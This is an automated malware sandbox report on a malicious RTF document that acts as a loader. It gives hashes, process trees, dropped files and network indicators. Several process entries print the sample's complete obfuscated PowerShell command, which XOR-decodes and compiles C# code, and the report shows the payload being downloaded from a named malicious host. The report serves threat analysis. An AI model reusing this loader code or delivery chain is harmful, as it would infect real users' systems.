analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

583524278.doc

Full analysis: https://app.any.run/tasks/142115c1-2d77-4f87-ab24-65f54a465674
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 18, 2019, 04:32:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

D71ECE9B762E3CDFF2ACD8CC058EA40C

SHA1:

631A487320531DE0E0BB59D91DCCC7305FB5C782

SHA256:

5967CECCA69A0DCC326F4606F40AED778E489CA086EDBB7A3514C4291AC8AA5B

SSDEEP:

3072:oHMAYDodWAYDodWAYDodWAYDodWAYDodHtxS:1AQdAQdAQdAQdAQaS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2176)
    • Application was dropped or rewritten from another process

      • l9137e5.exe (PID: 2372)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 2176)
      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3020)
    • Executed via COM

      • EXCEL.EXE (PID: 2184)
      • EXCEL.EXE (PID: 2108)
      • EXCEL.EXE (PID: 1200)
      • EXCEL.EXE (PID: 2580)
      • EXCEL.EXE (PID: 2880)
      • excelcnv.exe (PID: 2948)
    • PowerShell script executed

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 2176)
      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3020)
    • Creates files in the user directory

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 2176)
      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3020)
      • cmd.exe (PID: 2156)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2560)
      • csc.exe (PID: 2124)
      • csc.exe (PID: 2332)
      • powershell.exe (PID: 2176)
      • csc.exe (PID: 2484)
      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3020)
      • csc.exe (PID: 3060)
      • csc.exe (PID: 2480)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2772)
      • csc.exe (PID: 2484)
      • powershell.exe (PID: 2176)
    • Starts CMD.EXE for commands execution

      • l9137e5.exe (PID: 2372)
  • INFO

    • Reads the machine GUID from the registry

      • EXCEL.EXE (PID: 2184)
      • EXCEL.EXE (PID: 2108)
      • WINWORD.EXE (PID: 3012)
      • EXCEL.EXE (PID: 2580)
      • EXCEL.EXE (PID: 1200)
      • EXCEL.EXE (PID: 2880)
      • excelcnv.exe (PID: 2948)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2184)
      • EXCEL.EXE (PID: 2108)
      • WINWORD.EXE (PID: 3012)
      • EXCEL.EXE (PID: 2580)
      • EXCEL.EXE (PID: 1200)
      • EXCEL.EXE (PID: 2880)
      • excelcnv.exe (PID: 2948)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2176)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 2176)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
69
Monitored processes
25
Malicious processes
1
Suspicious processes
5

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excelcnv.exe no specs csc.exe cvtres.exe no specs csc.exe l9137e5.exe no specs cvtres.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\583524278.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
2184"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.4756.1000
2772powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '1a42510c51153216424c075b0e141c5856051666181c455d0f1867140145510f531b2801455d105945320a434e0b55501254444b0b5852413c484b1653584f2b585905585a121b585b110d4012065f5f42654c121b54554c7f7a5a1a42510c51153216424c075b1b2f0a45036f3c45140d5d510116560d0e424b424c57570c070c004d6e25035d710f465a131b191a0953470f0a5d0b5014192401454a1b665a08014505407150153f4357017751051d544b11141c3c4f414d005a5c024f424c03425c024f54401653470f4f7856166641134f480e540e00550e19710c4265151d114b50020d5458051411424708015618090e56555a18033972590d265c480d4441494d5a5d1058500d5c031a4e16700f1b434132595c0f1b11054214790e0e55740b5447001d481a4b6b15111a53540b5515121b504c0b55150417455d10581528014568164415065a040006520c491c454a0b5852411b545d03070352460a63265a592802415710421d4304544a0c5359525d131442735b151d48680d5f5b1552136e0b4441140e5d68105941040c451a4b6b15111a53540b5515121b504c0b55150417455d10581503005e5442570d5457035e4a7f5b153f454a424351560c5514377f5b153f454a425a500209035c551a1514065f4c425d045258505d571a150e1a4518175f5b154f595e00530248546a7c0e5a7c0c1f5e4a161e172a0a4356075a06534155540e1419412a5f4c104f650e065f4c5f146715037c5714537804025e4a1b1419413c544c2e5746152a434a0d4408070e5d4b071f68411c4559165f56410a494c07445b41195e51061644025a520f4a7f5b153f454a425b01050a535a4e7f5b153f454a425d57525b55094e5f5b154f4b0e000402525e18031243570d065218114254150652180b5841411e020e065753034718432b5841311b4318100102550a52185f1652545a095c060f1d0d5b050a5b001d435f540d010257510d0000570705055f021a4b1f0e0809194a550101040c0c052b5841311b43163853470e464a5f0d425a410a085e00040c5a127856166641134f5f0b0407025c16070e5a03010047430f55025002435d0c56040c5747130a070356550d015a540300575f0108530106550b010c570600515e021a4b1f0e0809195651500456520c710c4265151d1f6207445a481456571659150456575a500f0e1c3a7856166641134f4b0c5752545652196d2b5841311b4311570d400801451807570c525e0405520d5c074710595a030d5309195651500456434b0c575254564301405606190e1a451807570c525e04114b4d520e1b5e18070f53035d08031f744c150a6a65424f53055b005d5f4d05195c0014524e53074301405b06485a265f4c324247411f525b5457082c0e434b0a57594f2e5d540d557d26035e5a035a1d52460a75034446090e5d162159451847485e06020404430114125556570e1d0b4b0d44025a520f4a5850164f785616664113475f0b0407024f3b5e710c420355471813524e05515e53114e465602595014511f0e0456575a500f0f4138545a215a5c04014518050400555652050c53424138545a215a5c040145104b0d46151d5856051657035b020f0005082401475110595b0c0a5f4c4c715015295e54065347310e45504a735b170643570c5b500f1b1f6b125356080e5d7e0d5a51041d1f79124659080c504c0b595b250e45594b1d173d335d01530502045a13130e020153560710400204545b05085201174854560a57020c024175571558590e0e557e0b5a504903050c500f03494d010f560301025e030c570653550a0508570500505f520d550204515b005c560e00575f020d550356510e0509570400565f57095b06055456045b520205005a070856060754570509570201515f061a4b1a57035b020f00051c5a3f4357015346123c455910427c0f095e1812070d070b55050c5342413f4357015346123c455910427c0f095e100054015258530b4b0d651300525d11451b321b504a161e455057575c061f0e130a454d10581551544c48175459080c114b165741080c114b16445c0f0811545602075859194b16445c0f0811555b550256464a4b16445c0f08114b50020d54580505405904590d070d03140e121b43510c5115065a040006520c5c3c454a0b58524f2a5c48164f0e070043100b584141060c08595f090c56520f5518790401564c0a0d5c4a52031119544c150a114154000d545b500521595b170a434c4c625a2316455d4a5b0c02580616314357121b43510c511d084303114e07034854560d570e5105561a054a555d001d18101b0003595a0559426815125d05005701013a475817501f15444f420a560e00565b1f7407585215076c11594b47041b444a0c1652545a095c060f0e1c12'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2108"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.4756.1000
2560powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '1a42510c51153216424c075b0e141c5856051666181c455d0f1867140145510f531b2801455d105945320a434e0b55501254444b0b5852413c484b1653584f2b585905585a121b585b110d4012065f5f42654c121b54554c7f7a5a1a42510c51153216424c075b1b2f0a45036f3c45140d5d510116560d0e424b424c57570c070c004d6e25035d710f465a131b191a0953470f0a5d0b5014192401454a1b665a08014505407150153f4357017751051d544b11141c3c4f414d005a5c024f424c03425c024f54401653470f4f7856166641134f480e540e00550e19710c4265151d114b50020d5458051411424708015618090e56555a18033972590d265c480d4441494d5a5d1058500d5c031a4e16700f1b434132595c0f1b11054214790e0e55740b5447001d481a4b6b15111a53540b5515121b504c0b55150417455d10581528014568164415065a040006520c491c454a0b5852411b545d03070352460a63265a592802415710421d4304544a0c5359525d131442735b151d48680d5f5b1552136e0b4441140e5d68105941040c451a4b6b15111a53540b5515121b504c0b55150417455d10581503005e5442570d5457035e4a7f5b153f454a424351560c5514377f5b153f454a425a500209035c551a1514065f4c425d045258505d571a150e1a4518175f5b154f595e00530248546a7c0e5a7c0c1f5e4a161e172a0a4356075a06534155540e1419412a5f4c104f650e065f4c5f146715037c5714537804025e4a1b1419413c544c2e5746152a434a0d4408070e5d4b071f68411c4559165f56410a494c07445b41195e51061644025a520f4a7f5b153f454a425b01050a535a4e7f5b153f454a425d57525b55094e5f5b154f4b0e000402525e18031243570d065218114254150652180b5841411e020e065753034718432b5841311b4318100102550a52185f1652545a095c060f1d0d5b050a5b001d435f540d010257510d0000570705055f021a4b1f0e0809194a550101040c0c052b5841311b43163853470e464a5f0d425a410a085e00040c5a127856166641134f5f0b0407025c16070e5a03010047430f55025002435d0c56040c5747130a070356550d015a540300575f0108530106550b010c570600515e021a4b1f0e0809195651500456520c710c4265151d1f6207445a481456571659150456575a500f0e1c3a7856166641134f4b0c5752545652196d2b5841311b4311570d400801451807570c525e0405520d5c074710595a030d5309195651500456434b0c575254564301405606190e1a451807570c525e04114b4d520e1b5e18070f53035d08031f744c150a6a65424f53055b005d5f4d05195c0014524e53074301405b06485a265f4c324247411f525b5457082c0e434b0a57594f2e5d540d557d26035e5a035a1d52460a75034446090e5d162159451847485e06020404430114125556570e1d0b4b0d44025a520f4a5850164f785616664113475f0b0407024f3b5e710c420355471813524e05515e53114e465602595014511f0e0456575a500f0f4138545a215a5c04014518050400555652050c53424138545a215a5c040145104b0d46151d5856051657035b020f0005082401475110595b0c0a5f4c4c715015295e54065347310e45504a735b170643570c5b500f1b1f6b125356080e5d7e0d5a51041d1f79124659080c504c0b595b250e45594b1d173d335d01530502045a13130e020153560710400204545b05085201174854560a57020c024175571558590e0e557e0b5a504903050c500f03494d010f560301025e030c570653550a0508570500505f520d550204515b005c560e00575f020d550356510e0509570400565f57095b06055456045b520205005a070856060754570509570201515f061a4b1a57035b020f00051c5a3f4357015346123c455910427c0f095e1812070d070b55050c5342413f4357015346123c455910427c0f095e100054015258530b4b0d651300525d11451b321b504a161e455057575c061f0e130a454d10581551544c48175459080c114b165741080c114b16445c0f0811545602075859194b16445c0f0811555b550256464a4b16445c0f08114b50020d54580505405904590d070d03140e121b43510c5115065a040006520c5c3c454a0b58524f2a5c48164f0e070043100b584141060c08595f090c56520f5518790401564c0a0d5c4a52031119544c150a114154000d545b500521595b170a434c4c625a2316455d4a5b0c02580616314357121b43510c511d084303114e07034854560d570e5105561a054a555d001d18101b0003595a0559426815125d05005701013a475817501f15444f420a560e00565b1f7407585215076c11594b47041b444a0c1652545a095c060f0e1c12'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2580"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.4756.1000
2332"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\jxsnj0ga.cmdline"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.5483 (Win7SP1GDR.050727-5400)
2672C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA252.tmp" "c:\Users\admin\AppData\Local\Temp\CSCA251.tmp"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.5003 (Win7SP1GDR.050727-5400)
2176powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '1a42510c51153216424c075b0e141c5856051666181c455d0f1867140145510f531b2801455d105945320a434e0b55501254444b0b5852413c484b1653584f2b585905585a121b585b110d4012065f5f42654c121b54554c7f7a5a1a42510c51153216424c075b1b2f0a45036f3c45140d5d510116560d0e424b424c57570c070c004d6e25035d710f465a131b191a0953470f0a5d0b5014192401454a1b665a08014505407150153f4357017751051d544b11141c3c4f414d005a5c024f424c03425c024f54401653470f4f7856166641134f480e540e00550e19710c4265151d114b50020d5458051411424708015618090e56555a18033972590d265c480d4441494d5a5d1058500d5c031a4e16700f1b434132595c0f1b11054214790e0e55740b5447001d481a4b6b15111a53540b5515121b504c0b55150417455d10581528014568164415065a040006520c491c454a0b5852411b545d03070352460a63265a592802415710421d4304544a0c5359525d131442735b151d48680d5f5b1552136e0b4441140e5d68105941040c451a4b6b15111a53540b5515121b504c0b55150417455d10581503005e5442570d5457035e4a7f5b153f454a424351560c5514377f5b153f454a425a500209035c551a1514065f4c425d045258505d571a150e1a4518175f5b154f595e00530248546a7c0e5a7c0c1f5e4a161e172a0a4356075a06534155540e1419412a5f4c104f650e065f4c5f146715037c5714537804025e4a1b1419413c544c2e5746152a434a0d4408070e5d4b071f68411c4559165f56410a494c07445b41195e51061644025a520f4a7f5b153f454a425b01050a535a4e7f5b153f454a425d57525b55094e5f5b154f4b0e000402525e18031243570d065218114254150652180b5841411e020e065753034718432b5841311b4318100102550a52185f1652545a095c060f1d0d5b050a5b001d435f540d010257510d0000570705055f021a4b1f0e0809194a550101040c0c052b5841311b43163853470e464a5f0d425a410a085e00040c5a127856166641134f5f0b0407025c16070e5a03010047430f55025002435d0c56040c5747130a070356550d015a540300575f0108530106550b010c570600515e021a4b1f0e0809195651500456520c710c4265151d1f6207445a481456571659150456575a500f0e1c3a7856166641134f4b0c5752545652196d2b5841311b4311570d400801451807570c525e0405520d5c074710595a030d5309195651500456434b0c575254564301405606190e1a451807570c525e04114b4d520e1b5e18070f53035d08031f744c150a6a65424f53055b005d5f4d05195c0014524e53074301405b06485a265f4c324247411f525b5457082c0e434b0a57594f2e5d540d557d26035e5a035a1d52460a75034446090e5d162159451847485e06020404430114125556570e1d0b4b0d44025a520f4a5850164f785616664113475f0b0407024f3b5e710c420355471813524e05515e53114e465602595014511f0e0456575a500f0f4138545a215a5c04014518050400555652050c53424138545a215a5c040145104b0d46151d5856051657035b020f0005082401475110595b0c0a5f4c4c715015295e54065347310e45504a735b170643570c5b500f1b1f6b125356080e5d7e0d5a51041d1f79124659080c504c0b595b250e45594b1d173d335d01530502045a13130e020153560710400204545b05085201174854560a57020c024175571558590e0e557e0b5a504903050c500f03494d010f560301025e030c570653550a0508570500505f520d550204515b005c560e00575f020d550356510e0509570400565f57095b06055456045b520205005a070856060754570509570201515f061a4b1a57035b020f00051c5a3f4357015346123c455910427c0f095e1812070d070b55050c5342413f4357015346123c455910427c0f095e100054015258530b4b0d651300525d11451b321b504a161e455057575c061f0e130a454d10581551544c48175459080c114b165741080c114b16445c0f0811545602075859194b16445c0f0811555b550256464a4b16445c0f08114b50020d54580505405904590d070d03140e121b43510c5115065a040006520c5c3c454a0b58524f2a5c48164f0e070043100b584141060c08595f090c56520f5518790401564c0a0d5c4a52031119544c150a114154000d545b500521595b170a434c4c625a2316455d4a5b0c02580616314357121b43510c511d084303114e07034854560d570e5105561a054a555d001d18101b0003595a0559426815125d05005701013a475817501f15444f420a560e00565b1f7407585215076c11594b47041b444a0c1652545a095c060f0e1c12'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1200"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.4756.1000
Total events
5 784
Read events
4 996
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
10
Text files
14
Unknown types
7

Dropped files

PID
Process
Filename
Type
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7C6A.tmp.cvr
MD5:
SHA256:
2184EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR9021.tmp.cvr
MD5:
SHA256:
2108EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR9A62.tmp.cvr
MD5:
SHA256:
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R009GNMLXFSIQA2AP6Z6.temp
MD5:
SHA256:
2580EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR9F54.tmp.cvr
MD5:
SHA256:
2332csc.exeC:\Users\admin\AppData\Local\Temp\CSCA251.tmp
MD5:
SHA256:
2332csc.exeC:\Users\admin\AppData\Local\Temp\jxsnj0ga.pdb
MD5:
SHA256:
2672cvtres.exeC:\Users\admin\AppData\Local\Temp\RESA252.tmp
MD5:
SHA256:
2332csc.exeC:\Users\admin\AppData\Local\Temp\jxsnj0ga.dll
MD5:
SHA256:
2332csc.exeC:\Users\admin\AppData\Local\Temp\jxsnj0ga.out
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
powershell.exe
GET
200
107.172.13.106:443
https://binaterynaaik.com/583524279.exe
US
executable
419 Kb
unknown
2176
powershell.exe
GET
200
107.172.13.106:443
https://binaterynaaik.com/583524279.exe
US
executable
419 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2176
powershell.exe
107.172.13.106:443
binaterynaaik.com
ColoCrossing
US
unknown
2772
powershell.exe
107.172.13.106:443
binaterynaaik.com
ColoCrossing
US
unknown

DNS requests

Domain
IP
Reputation
binaterynaaik.com
  • 107.172.13.106
unknown

Threats

No threats detected
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cppĖ
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144